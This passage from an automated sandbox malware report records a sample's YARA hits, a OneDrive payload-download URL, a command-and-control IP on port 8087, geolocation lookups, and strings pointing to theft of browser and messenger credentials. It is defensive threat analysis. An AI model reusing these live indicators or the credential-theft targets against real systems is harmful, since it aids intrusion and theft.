                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Malware configuration extractorURLs: https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng
                    Source: Malware configuration extractorURLs: 107.175.229.139
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_0291CF48 InternetCheckConnectionA,0_2_0291CF48
                    Source: global trafficTCP traffic: 192.168.2.5:49707 -> 107.175.229.139:8087
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                    Source: Joe Sandbox ViewIP Address: 107.175.229.139 107.175.229.139
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: global trafficHTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: global trafficHTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: global trafficHTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.139
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0041B380
                    Source: global trafficHTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: global trafficHTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: global trafficHTTP traffic detected: GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: SndVol.exe, 00000004.00000003.2047281585.00000000031FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: SndVol.exe, 00000004.00000003.2047281585.00000000031FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: SndVol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: SndVol.exe, 00000003.00000002.4420280091.000000001F0E0000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: SndVol.exe, 00000003.00000002.4420280091.000000001F0E0000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
                    Source: global trafficDNS traffic detected: DNS query: 2hhi9w.am.files.1drv.com
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: SndVol.exe, 00000003.00000003.2022947923.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2017852244.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408677302.00000000034F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: SndVol.exe, 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: SndVol.exe, 00000003.00000003.2050939936.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2022947923.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408617814.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2299239501.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2051064837.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2017852244.00000000034BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpY
                    Source: SndVol.exe, 00000003.00000003.2019710060.00000000034F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gph
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0:
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocsp.msocsp.com0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocsp.msocsp.com0S
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://ocspx.digicert.com0E
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: SndVol.exe, 00000008.00000002.2033248521.000000000322D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhv3259.tmp.4.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                    Source: SndVol.exe, 00000004.00000002.2047760751.0000000000963000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2033128865.000000007FCE9000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2003278216.00000000022E2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/
                    Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/gd
                    Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWp
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwC
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3L
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3LL
                    Source: Jsqwmpul.PIF, 0000000C.00000002.2251582423.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mKPtT-rAbG4inW0O2_-07PoRY_sfXHa6qbFlkBszZbmAY1MzHswFDHO6u63PruOhI
                    Source: Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_Y
